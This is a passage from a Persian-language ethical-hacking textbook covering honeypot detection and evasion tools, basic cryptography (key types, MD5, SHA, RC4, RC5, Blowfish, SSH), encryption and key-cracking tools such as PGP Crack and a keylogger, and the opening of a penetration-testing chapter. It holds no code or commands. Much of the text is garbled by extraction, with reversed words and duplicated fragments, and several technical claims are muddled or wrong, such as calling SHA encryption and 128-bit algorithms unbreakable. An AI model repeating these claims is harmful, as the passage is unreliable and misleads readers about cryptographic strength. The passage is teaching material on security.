ﻫﻜﺮ ﺑﺮاي ﮔﺮﻳﺰ از ﺑﻪ دام اﻓﺘﺎدن ﺗﻮﺳﻂ honeypot ﻫﺎ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﻧﺮم اﻓﺰار anti-honeypot اﺟﺮا ﻛﻨﺪ ﺗﺎ اﻳﻦ ﻧﺮم اﻓﺰار، ﻣﺸﺨﺺ ﻛﻨﺪ آﻳﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺪف، honeypot در ﺣﺎل اﺟﺮا اﺳﺖ ﻳﺎ ﻧﻪ، و آن را ﺑﻪ ﻫﻜﺮ اﻃﻼع دﻫﺪ . در اﻳﻦ روش، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻼش ﻛﻨﺪ ﺗﺎ از ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪن ﺗﻮﺳﻂ honeypot ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . ﺑﺴﻴﺎري از ﻧﺮم اﻓﺰارﻫﺎي anti-honeypot ، ﻧﺮم اﻓﺰار در ﺣﺎل اﺟﺮا ﺑﺮ روي ﺳﻴﺴﺘﻢ را ﺑﺎ ﻟﻴﺴﺘﻲ از honeypot ﻫﺎي ﻣﻌﺮوف از ﻗﺒﻴﻞ honeyd و ... ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﻨﺪ . .

اﺑﺰارﻫﺎ Honeypot ﻫﺎ ﻫﻢ ﺑﺼﻮرت ﺗﺠﺎري و ﻫﻢ ﺑﺼﻮرت open source وﺟﻮد دارﻧﺪ : : Honeypot ﻫﺎي ﺗﺠﺎري : : KFSensor • NetBait • ManTrap • Spector •

Joneypot ﻫﺎي open source : : Bubblegum • Jackpot • BackOfficer Friendly • Bait-n-Switch • Bigeye • HoneyWeb • Deception Toolkit • LaBrea Tarpit • Honeyed •

221

Honeynets • Sendmail SPAM Trap • Tiny Honeypot •

Specter ، ﻳﻚ honeypot اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ اﻃﻼﻋﺎت ﻣﺎﺷﻴﻦ ﻫﻜﺮ را در ﺣﺎل ﻫﻚ ﺳﻴﺴﺘﻢ، ﺑﺪﺳﺖ آورد . .

Honeyd ، ﻳﻚ honeypot اﭘﻦ ﺳﻮرس اﺳﺖ ﻛﻪ ﻴﺷﺎﻣ ﻦ ﻫﺎي ﻣﺠﺎزي ﺑﺮ روي ﺷﺒﻜﻪ اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ و ﻫﺪﻓﻲ ﺑﺮاي ﻫﻜﺮﻫﺎ ﻣﻲ ﺷﻮد . .

KFSensor ، ﻳﻚ HIDS اﺳﺖ ﻛﻪ ﺑﻪ ﻋﻨﻮان honeypot ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ و ﻣﻲ ﺗﻮاﻧﺪ ﺳﺮوﻳﺲ ﻫﺎي ﻣﺠﺎزي و ﺗﺮوﺟﺎن ﻫﺎ را ﺷﺒﻴﻪ ﺳﺎزي ﻛﻨﺪ . .

Sebek ، اﺑﺰار honeypot ﺑﺮاي ﮔﺮﻓﺘﻦ داده ﻫﺎ اﺳﺖ ﻛﻪ ﻛﻠﻴﺪﻫﺎي ﻓﺸﺮده ﺷﺪه ﺗﻮﺳﻂ ﻫﻜﺮ را ﺑﺪﺳﺖ ﻣﻲ آورد . .

Honeypot ﻓﻴﺰﻳﻜﻲ و ﻣﺠﺎزي

Honeypot ﻓﻴﺰﻳﻜﻲ ، ﻳﻚ ﻣﺎﺷﻴﻦ واﻗﻌﻲ ﺑﺮ روي ﺷﺒﻜﻪ اﺳﺖ ﻛﻪ داراي آدرس IP اﺳﺖ و اﻏﻠﺐ ﺑﺼﻮرت -high interaction ﺳا ﺖ و اﺟﺎزه ﺑﻪ ﺧﻄﺮ اﻓﺘﺎدن ﺳﻴﺴﺘﻢ را ﺑﻄﻮر ﻛﺎﻣﻞ ﻣﻲ دﻫﺪ . ﻧﺼﺐ و ﻧﮕﻬﺪاري اﻳﻦ ﺳﻴﺴﺘﻢ ﻫﺎ، ﭘﺮﻫﺰﻳﻨﻪ اﺳﺖ . Honeypot ﻣﺠﺎزي، ﺗﻮﺳﻂ ﻣﺎﺷﻴﻦ ﻫﺎي دﻳﮕﺮ ﺷﺒﻴﻪ ﺳﺎزي ﻣﻲ ﺷﻮد ﻛﻪ ﺑﻪ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ ﻛﻪ ﺑﻪ ﺳﻤﺖ honeypot ﻣﺠﺎزي ارﺳﺎل ﻣﻲ ﺷﻮد، ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ . ﺑﺮاي ﻣﺤﻴﻂ ﻫﺎي ﺑﺎ ﻓﻀﺎي آدرس ﺑﺰررگ، ﭘﻴﺎده ﺳﺎزي honeypot ﻓﻴﺰﻳﻜﻲ ﺑﺮاي ﻫﺮ آدرس IP ، ﻏﻴﺮﻣﻤﻜﻦ اﺳﺖ د ر اﻳﻦ ﺣﺎﻟﺖ، ﻣﻲ ﺗﻮاﻧﺪ از honeypot ﻫﺎي ﻣﺠﺎزي اﺳﺘﻔﺎده ﻛﺮد . .

اﺑﺰارﻫﺎي ﻫﻚ Send-Safe Honeypot Hunter ، اﺑﺰار ﺷﻨﺎﺳﺎﻳﻲ honeypot اﺳﺖ ﻛﻪ honeypot ﻫﺎ را ﻲﻳﺎﺳﺎﻨﺷ ﻣﻲ ﻛﻨﺪ . .

Nessus Vulnerability Scanner ، ﻧﻴﺰ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ honeypot ﻫﺎ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮد . .

222

ﻓﺼﻞ ﭼﻬﺎردﻫﻢ

رﻣﺰﻧﮕﺎري

ﻣﻘﺪﻣﻪ

رﻣﺰﻧﮕﺎري، ﻣﻄﺎﻟﻌﻪ رﻣﺰﮔﺬاري و اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري اﺳﺖ . در واﻗﻊ، رﻣﺰ ﻧﮕﺎري ، ﺗﺒﺪﻳﻞ ﭘﻴﺎم از ﺣﺎﻟﺖ ﻗﺎﺑﻞ درك ( clear text ) ﺑﻪ ﺣﺎﻟﺖ ﻏﻴﺮ ﻗﺎﺑﻞ درك ( cipher text ) و ﺑﺮﻋﻜﺲ اﺳﺖ . ﻫﺪف از رﻣﺰﮔﺬاري، ﺗﺒﺪﻳﻞ داده ﻫﺎ ﺑﻪ ﺣﺎﻟﺘﻲ اﺳﺖ ﻛﻪ اﺳﺘﺮاق ﺳﻤﻊ ﻛﻨﻨﺪه ﻳﺎ ﻛﺴﻲ ﻛﻪ رﻣﺰ را ﻧﺪارد، ﻧﺘﻮاﻧﺪ داده ﻫﺎ را ﺑﺨﻮاﻧﺪ . رﻣﺰﮔﺬاري ﺑﺮاي اﻣﻦ ﺳﺎزي ارﺗﺒﺎﻃﺎت اﺳﺖ . رﻣﺰﻧﮕﺎري، ﺗﻜﻨﻴﻚ ﻫﺎي ﻣﻮرد اﺳﺘﻔﺎده در رﻣﺰﮔﺬاري را ﺗﻌﺮﻳﻒ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻓﺼﻞ، رﻣﺰﻧﮕﺎري و اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري را ﺗﻮﺿﻴﺢ ﺧﻮاﻫﺪ داد . .

ﺗﻜﻨﻴﻚ ﻫﺎي رﻣﺰﻧﮕﺎري و رﻣﺰﮔﺬاري

رﻣﺰﮔﺬاري، ﺑﺮاي رﻣﺰ ﻛﺮدن داده ﻫﺎ در ﻃﻮل ارﺳﺎل ﻳﺎ ذﺧﻴﺮه ﺑﺮ روي ﻫﺎرد، اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . رﻣﺰﻧﮕﺎري، ﻣﻄﺎﻟﻌﻪ درﺑﺎره ﻣﺤﺎﻓﻈﺖ از اﻃﻼﻋﺎت ﺗﻮﺳﻂ ﻓﺮﻣﻮل ﻫﺎي رﻳﺎﺿﻲ اﺳﺖ ﺗﺎ اﮔﺮ ﻛﺴﻲ آن ﻓﺮﻣﻮل را ﻧﺪاﺷﺘﻪ ﺑﺎﺷﺪ ﻧﺘﻮاﻧﺪ آﻧﻬﺎ را رﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ . اﻳﻦ ﻓﺮﻣﻮل ﻫﺎي رﻳﺎﺿﻲ، اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري ﻧﺎم دارﻧﺪ . .

اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري ﻣﻲ ﺗﻮاﻧﻨﺪ از روش ﻫﺎي ﺳﺎده اي ﭼﻮن substitution ( ﺟﺎﻳﮕﺰﻳﻨﻲ ﻛﺎراﻛﺘﺮﻫﺎ ﺑﺎ ﻛﺎراﻛﺘﺮﻫﺎي دﻳﮕﺮ ) و transposition ( ﺗﻐﻴﻴﺮ ﺗﺮﺗﻴﺐ ﻛﺎراﻛﺘﺮ ﻫﺎ ) اﺳﺘﻔﺎده ﻛﻨﻨﺪ . اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري، ﻣﺤﺎﺳﺒﺎت رﻳﺎﺿﻲ ﺑﺮ ﭘﺎﻳﻪ substitution و transposition ﻫﺴﺘﻨﺪ . دو ﻧﻮع اﺻﻠﻲ رﻣﺰﮔﺬاري، رﻣﺰﮔﺬاري ﻛﻠﻴﺪ ﻣﺘﻘﺎرن و ﻧﺎﻣﺘﻘﺎرن اﺳﺖ . .

224

رﻣﺰﮔﺬاري ﻛﻠﻴﺪ ﻣﺘﻘﺎرن، ﺑﻪ اﻳﻦ ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ ﺑﺮاي رﻣﺰﮔﺬاري و رﻣﺰﮔﺸﺎﻳﻲ داده ﻫﺎ، از ﻳﻚ ﻛﻠﻴﺪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . اﻳﺮاد اﻳﻦ روش اﻳﻦ اﺳﺖ ﻛﻪ روﺷﻲ ﻣﻄﻤﺌﻦ ﺑﺮاي ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻦ ﻛﻠﻴﺪ ﺑﻴﻦ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ وﺟﻮد ﻧﺪارد و ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﺑﺎﻳﺪ از روش ﻫﺎي آﻓﻼﻳﻦ اﺳﺘﻔﺎده ﻛﺮد و اﻳﻨﻜﺎر در ﻣﺤﻴﻂ ﻫﺎي ﺑﺰرگ از ﻗﺒﻴﻞ اﻳﻨﺘﺮﻧﺖ، ﻋﻤﻠﻲ ﻧﻴﺴﺖ . .

رﻣﺰ راﺬﮔ ي ﻛﻠﻴﺪ ﻧﺎﻣﺘﻘﺎرن، ﺑﺮاي ﭘﻮﺷﺶ ﺿﻌﻒ ﻣﺪﻳﺮﻳﺖ و ﺗﻮزﻳﻊ ﻛﻠﻴﺪ ﻣﺘﻘﺎرن ﺑﻮﺟﻮد آﻣﺪ . در اﻳﻦ روش، از دو ﻛﻠﻴﺪ ﻳﻜﻲ ﺑﺮاي رﻣﺰﮔﺬاري و دﻳﮕﺮي ﺑﺮاي رﻣﺰﮔﺸﺎﻳﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

ﻧﺤﻮه ﺗﻮﻟﻴﺪ ﻛﻠﻴﺪﻫﺎي ﻋﻤﻮﻣﻲ و ﺧﺼﻮﺻﻲ

زﻣﺎﻧﻴﻜﻪ ﻛﻼﻳﻨﺖ و ﺳﺮور از رﻣﺰ راﺬﮔ ي ﻧﺎﻣﺘﻘﺎرن اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ، ﻫﺮ دو، ﺟﻔﺖ ﻛﻠﻴﺪﻫﺎي ﺧﻮد را ﺗﻮﻟﻴﺪ ﻣﻲ ﻛﻨﻨﺪ : ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺮور، ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺳﺮور، ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﻼﻳﻨﺖ، ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﻼﻳﻨﺖ . زوج ﻛﻠﻴﺪﻫﺎي ﻫﺮ ﻛﺪام از اﻳﻨﻬﺎ راﺑﻄﻪ رﻳﺎﺿﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ دارﻧﺪ ﻛﻪ اﺟﺎزه رﻣﺰﮔﺬاري داده ﻫﺎ ﺑﺎ ﻳﻜﻲ از ﻛﻠﻴﺪﻫﺎ و رﻣﺰﮔﺸﺎﻳﻲ ﺗﻮﺳﻂ ﻛﻠﻴﺪ دﻳﮕﺮ را ﻣﻲ دﻫﻨﺪ . اﻳﻦ ﻛﻠﻴﺪﻫﺎ، ﺑﺮ اﺳﺎس اﻋﺪاد اول، ﺑﺎ ﻳﻜﺪﻳﮕﺮ راﺑﻄﻪ رﻳﺎﺿﻲ دارﻧﺪ ﻛﻪ ﺳﺒﺐ ﻣﻲ ﺷﻮد داده اي ﻛﻪ ﺗﻮﺳﻂ ﻳﻜﻲ از اﻳﻦ ﻛﻠﻴﺪﻫﺎ رﻣﺰﮔﺬاري ﺷﺪه اﺳﺖ، ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﻛﻠﻴﺪ دﻳﮕﺮ آن ﺟﻔﺖ رﻣﺰﮔﺸﺎﻳﻲ ﺷﻮد . زﻣﺎﻧﻴﻜﻪ ﻛﻼﻳﻨﺖ و ﺳﺮوري ﺑﺨﻮاﻫﻨﺪ ﺑﺎ ﻳ ﻜﺪﻳﮕﺮ ارﺗﺒﺎط ﺑﺮﻗﺮار ﻛﻨﻨﺪ، ﻫﺮ ﻛﺪام از آﻧﻬﺎ، ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﻮد را ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮ ﻣﻲ ﻓﺮﺳﺘﺪ اﻣﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮد را اﻋﻼم ﻧﻤﻲ ﻛﻨﺪ . ﭘﻴﻐﺎم ﻫﺎ ﺑﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ درﻳﺎﻓﺖ ﻛﻨﻨﺪه رﻣﺰ ﻣﻲ ﺷﻮﻧﺪ و ﺗﻨﻬﺎ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﮔﻴﺮﻧﺪه ﻗﺎﺑﻞ رﻣﺰﮔﺸﺎﻳﻲ ﻫﺴﺘﻨﺪ . .

225

ﻧﮕﺎﻫﻲ ﺑﻪ اﻟﮕﻮرﻳﺘﻢ ﻫﺎي RC5 ، RC4 ، SHA ، MD5 ، و Blowfish

ﻃﻮل ﻛﻠﻴﺪ اﻟﮕﻮرﻳﺘﻢ ﻫﺎ از 40 ﺗﺎ 448 ﺑﻴﺖ ﻣﺘﻔﺎوت اﺳﺖ . ﻃﻮﻻﻧﻲ ﺑﻮدن ﻛﻠﻴﺪ ﺑﻪ ﻣﻌﻨﺎي ﻗﻮي ﺗﺮ ﺑﻮدن اﻟﮕﻮرﻳﺘﻢ رﻣﺰﮔﺬاري اﺳﺖ . ﺷﻜﺴﺘﻦ ﻛﻠﻴﺪ 40 ﺑﻴﺘﻲ ﺑﺎ اﺳﺘﻔﺎده از ﺣﻤﻠﻪ brute-force ، از 1,4 دﻗﻴﻘﻪ ﺗﺎ 0,2 ﺛﺎﻧﻴﻪ ﻃﻮل ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺴﺘﮕﻲ ﺑﻪ ﻗﺪرت ﻛﺎﻣﭙﻴﻮﺗﺮ ﭘﺮدازش ﻛﻨﻨﺪه دارد . در ﻣﻘﺎﻳﺴﻪ، ﺷﻜﺴﺘﻦ ﻳﻚ ﻛﻠﻴﺪ 64 ﺑﻴﺘﻲ، ﺑﻴﻦ 50 ﺳﺎل ﺗﺎ 37 روز ﻃﻮل ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺎز ﻫﻢ ﺑﺴﺘﮕﻲ ﺑﻪ ﺳﺮﻋﺖ ﭘﺮدازﻧﺪه دارد . در ﺣﺎل ﺣﺎﺿﺮ، ﻫﺮ ﻛﻠﻴﺪي ﺑﺎ ﻃﻮل 256 ﺑﻴﺘﻲ، ﻏﻴﺮ ﻗﺎﺑﻞ ﺷﻜﺴﺘﻦ اﺳﺖ . .

RC5 ، RC4 ، SHA ، MD5 ، و Blowfish اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻳﺎﺿﻲ ﻣﺨﺘﻠﻔﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮاي رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . .

MD5: ﻳﻚ اﻟﮕﻮرﻳﺘﻢ hashing اﺳﺖ ﻛﻪ ﺑﺮاي ﺗﻮﻟﻴﺪ ﻳﻚ ﺧﻼﺻﻪ ﭘﻴﺎم 128 ﺑﻴﺘﻲ، از ورودي ﺑﺎ ﻃﻮل ﺗﺼﺎدﻓﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﺳﺘﻔﺎده از اﻣﻀﺎي دﻳﺠﻴﺘﺎﻟﻲ ﺑﺮاي ﺗﺎﺋﻴﺪ اﺳﻨﺎد و اﻳﻤﻴﻞ ﻫﺎ ﺑﺴﻴﺎر راﻳﺞ اﺳﺖ . ﻓﺮآﻳﻨﺪ اﻣﻀﺎي دﻳﺠﻴﺘﺎﻟﻲ، ﺷﺎﻣﻞ اﻳﺠﺎد ﺧﻼﺻﻪ ﭘﻴﺎم MD5 از ﺳﻨﺪ اﺳﺖ ﻛﻪ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ارﺳﺎل ﻛﻨﻨﺪه، رﻣﺰ ﻣﻲ ﺷﻮد . .

SHA: ﻳﻚ ﭘﻴﺎم ﺧﻼﺻﻪ 160 ﺑﻴﺘﻲ از دا ده ﻫﺎ اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . SHA ، اﻧﺪﻛﻲ ﻃﻮﻻﻧﻲ ﺗﺮ از MD5 اﺳﺖ و ﺑﻨﺎﺑﺮاﻳﻦ، ﺑﻪ ﻋﻨﻮان رﻣﺰﮔﺬاري ﻗﺪرﺗﻤﻨﺪي ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . SHA ﻳﻚ اﻟﮕﻮرﻳﺘﻢ ﻣﻮرد دﻟﺨﻮاه ﺑﺮاي اﺳ ﺘﻔﺎده ﺗﻮﺳﻂ دوﻟﺖ اﺳﺖ . .

RC4 و RC4 :RC5 ﻳﻚ اﻟﮕﻮرﻳﺘﻢ ﻛﻠﻴﺪ ﻣﺘﻘﺎرن و ﻳﻚ streaming cipher اﺳﺖ اﻳﻦ ﺑﺪان ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ در ﻫﺮ ﻟﺤﻈﻪ ﻳﻚ ﺑﻴﺖ رﻣﺰ ﻣﻲ ﺷﻮد . RC4 از ﺟﺎﻳﮕﺸﺖ ﺗﺼﺎدﻓﻲ رﻳﺎﺿﻲ و اﻧﺪازه ﻣﺘﻐﻴﺮ ﻛﻠﻴﺪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . RC5 ، ﻧﺴﻞ ﺑﻌﺪي اﻟﮕﻮرﻳﺘﻢ اﺳﺖ . RC5 از ﺑﻠﻮك ﻫﺎ و ﻛﻠﻴﺪﻫﺎﻳﻲ ﺑﺎ اﻧﺪازه ﻣﺨﺘﻠﻒ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . RC5 ، ﺑﺎ ﻛﻠﻴﺪﻫﺎﻳﻲ ﺑﻪ اﻧﺪازه ﻛﻮﭼﻜﺘﺮ از 256 ﺷﻜﺴﺘﻪ ﺷﺪه اﺳﺖ . . blowfih :Blowfish ، ﺑﻠﻮك cipher ﺑﻪ اﻧﺪازه 64 ﺑﻴﺘﻲ اﺳﺖ ﻳﻌﻨﻲ اﻳﻨﻜﻪ داده ﻫﺎ را در ﺑﻠﻮك ﻫﺎ رﻣﺰﮔﺬاري ﻣﻲ ﻛﻨﺪ . اﻳﻦ روش، از stream cipher ﻗﻮي ﺗﺮ اﺳﺖ و ﻛﻠﻴﺪي ﻣﺘﻐﻴﺮ ﺑﻪ اﻧﺪازه 32 و 448 ﺑﻴﺘﻲ دارد . .

SSH

SSH ﺑﺮاي دورو ، اﺟﺮاي دﺳﺘﻮرات، و اﻧﺘﻘﺎل ﻓﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮ در ﺷﺒﻜﻪ، ﺗﻮﻧﻞ رﻣﺰ ﺷﺪه اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ ﻪﻛ. ﻪﻛ. ﺟﺎﻳﮕﺰﻳﻦ ﻣﻄﻤﺌﻨﻲ ﺑﺮاي telnet ﻣﺤﺴﻮب ﻣﻲ ﺷﻮد . SSH2 ﻧﻴﺰ ﻧﺴﺨﻪ اﻣﻦ ﺗﺮ SSH اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ SFTP اﺳﺖ . .

226

زا اﻟﮕﻮرﻳﺘﻢ ﻫﺎي 40 ﺑﻴﺘﻲ اﺳﺘﻔﺎده ﻧﻤﻲ ﺷﻮ .د اﻟﮕﻮرﻳﺘﻢ ﻫﺎﻳﻲ ﻛﻪ از ﻛﻠﻴﺪ 56 ﺑﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ، ﺗﺎ ﺣﺪي ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ را اﻳﺠﺎد ﻣﻲ ﻛﻨﻨﺪ وﻟﻲ آﺳﻴﺐ ﭘﺬﻳﺮﻧﺪ هزوﺮﻣا. اﻟﮕﻮرﻳﺘﻢ ﻫﺎي 64 ﺑﻴﺘﻲ، اﻣﻦ ﻫﺴﺘﻨﺪ وﻟﻲ اﻧﺘﻈﺎر ﻣﻲ رود ﻛﻪ ﺑﻪ زودي ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ . اﻟﮕﻮرﻳﺘﻢ ﻫﺎي 128 ﺑﻴﺘﻲ، ﻏﻴﺮ ﻗﺎﺑﻞ ﺷﻜﺴﺘﻦ ﻫﺴﺘﻨﺪ . ﺷﻜﺴﺘﻦ اﻟﮕﻮرﻳﺘﻢ ﻫﺎي 256 ﺑﻴﺘﻲ، ﻏﻴﺮ ﻣﻤﻜﻦ اﺳﺖ . .

اﺑﺰارﻫﺎ Advanced File Encryptor ، اﺑﺰاري ﺑﺮاي رﻣﺰﮔﺬاري و اﻣﻦ ﺳﺎزي ﻓﺎﻳﻞ ﻫﺎي ﺑﺴﻴﺎر ﻣﻬﻢ از ﻗﺒﻴﻞ اﻃﻼﻋﺎت ﺑﺎﻧﻜﻲ، اﻳﻤﻴ ﻞ ﻫﺎ، و ﻳﺎ ﻫﺮ ﻓﺎﻳﻞ ﺑﺎ ارزش دﻳﮕﺮ اﺳﺖ . اﻳﻦ ﺑﺮﻧﺎﻣﻪ از ﻛﻠﻴﺪ 256 ﺑﻴﺘﻲ AES ﺑﺮاي رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﺗﻀﻤﻴﻦ ﻣﻲ ﻛﻨﺪ ﻛﻪ اﻃﻼﻋﺎت اﻣﻦ ﻫﺴﺘﻨﺪ . .

Command Line Scriptor ، ﻋﻤﻠﻴﺎت رﻣﺰﮔﺬاري، رﻣﺰﮔﺸﺎﻳﻲ، اﻣﻀﺎي دﻳﺠﻴﺘﺎﻟﻲ، و ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ را ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ اﻧﺠﺎم ﻣﻲ دﻫﺪ . ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﺗﻮان ﻓﺎﻳﻞ ﻫﺎ و اﻳﻤﻴﻞ ﻫﺎ را ﺑﺪون ﻣﺪاﺧﻠﻪ ﻛﺎرﺑﺮ و ﺑﺼﻮرت اﻣﻦ ارﺳﺎل ﻛﺮد . .

227

PGP ، ﺑﺴﺘﻪ ﻧﺮم اﻓﺰاري اﺳﺖ ﻛﻪ ﺑﺮاي رﻣﺰﮔﺬاري ﭘﻴﺎم ﻫﺎ، اﻣﻀﺎﻫﺎي دﻳﺠﻴﺘﺎﻟﻲ، ﻓﺸﺮده ﺳﺎزي داده ﻫﺎ، و ... ﺑﻜﺎر ﻣﻲ رود . اﻳﻦ ﻧﺮم اﻓﺰار در ﭘﻠﺖ ﻓﺮم ﻫﺎي ﻣﺨﺘﻠﻒ ﻗﺎﺑﻞ اﺳﺘﻔﺎده اﺳﺖ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎ ﺑﺮاي رﻣﺰﻧﮕﺎري ﻋﺒﺎرﺗﻨﺪ از : Encrypt ، Encrypt Easy ، Encrypt PDF ، Encryption Engine ABC ، Omziff ، Alive File Encryption ، Advanced HTML Encrypt and Password Protect ، My Folder Command Line Scriptor ، CrypTool ، SafeCryptor ، CryptoForge ، EncryptOnClick ، CHAOS . .

اﺑﺰارﻫﺎي ﻫﻚ PGP Crack ، ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي اﻧﺠﺎم brute force ﺑﺮاي ﻓﺎﻳﻞ ﻫﺎي رﻣﺰ ﺷﺪه ﺑﺎ PGP اﺳﺖ . .

Magic Lantern ، ﻧﺮم اﻓﺰاري ﺑﺮاي ﺷﻜﺴﺘﻦ ﻛﻠﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ اﺳﺖ ﻛﻪ از اﻟﮕﻮرﻳﺘﻢ ﻫﺎي ﻗﻮي اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﺑﺮﻧﺎﻣﻪ، وﻳﺮوﺳﻲ را وارد ﻛﺎﻣﭙﻴﻮﺗﺮ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﻋﻨﻮان keylogger ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ و ﻛﻠﻴﺪﻫﺎي ﻓﺸﺮده ﺷﺪه ﺗﻮﺳﻂ ﻛﺎرﺑﺮ را ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ . .

228

ﻓﺼﻞ ﭘ ﺎﻧﺰدﻫﻢ

روش ﻫﺎي ﺗﺴﺖ ﻧﻔﻮذ

ﻣﻘﺪﻣﻪ

ﺗﺴﺖ ﻧﻔﻮذ، ﺣﻤﻠﻪ ﻫﻜﺮ ﺑﺮاي ﮔﺮﻓﺘﻦ دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ ﻳﺎ ﺳﻴﺴﺘﻢ ﻫﺎي ﻳﻚ ﺳﺎزﻣﺎن را ﺷﺒﻴﻪ ﺳﺎزي ﻣﻲ ﻛﻨﺪ . ﻫﺪف از ﺗﺴﺖ ﻧﻔﻮذ، ﺑﺮرﺳﻲ ﭘﻴﺎده ﺳﺎزي و ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﻳﻚ ﺳﺎزﻣﺎن اﺳﺖ : اﺳﺎﺳﺎ ﺑﺮاي ﻣﺸﺎﻫﺪه اﻳﻨﻜﻪ آﻳﺎ ﺳﺎزﻣﺎن، ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﻛﻪ در ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﻣﺸﺨﺺ ﻛﺮده اﺳﺖ را ﺑﻪ درﺳﺘﻲ ﭘﻴﺎده ﺳﺎزي ﻛﺮده ﻳﺎ .ﻧﻪ .ﻧﻪ

ﻫﻜﺮي ﻛﻪ ﻗﺼﺪ دارد ﺑﻪ ﺷﺒﻜﻪ ﻳﻚ ﺳﺎزﻣﺎن دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ، ﺑﺎ ﺷﺨﺼﻲ ﻛﻪ ﻋﻤﻞ ﺗﺴﺖ ﻧﻔﻮذ ( Pen tester ) را اﻧﺠﺎم ﻣﻲ دﻫﺪ و از داﻧﺶ ﺧﻮد ﺟﻬﺖ اﻓﺰاﻳﺶ اﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺳﺎزﻣﺎن ﺑﺪون اﻳﺠﺎد ﺧﻄﺮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ، ﻣﺘﻔﺎوت اﺳﺖ . .

ارزﻳﺎﺑﻲ ﻫﺎي اﻣﻨﻴﺘﻲ

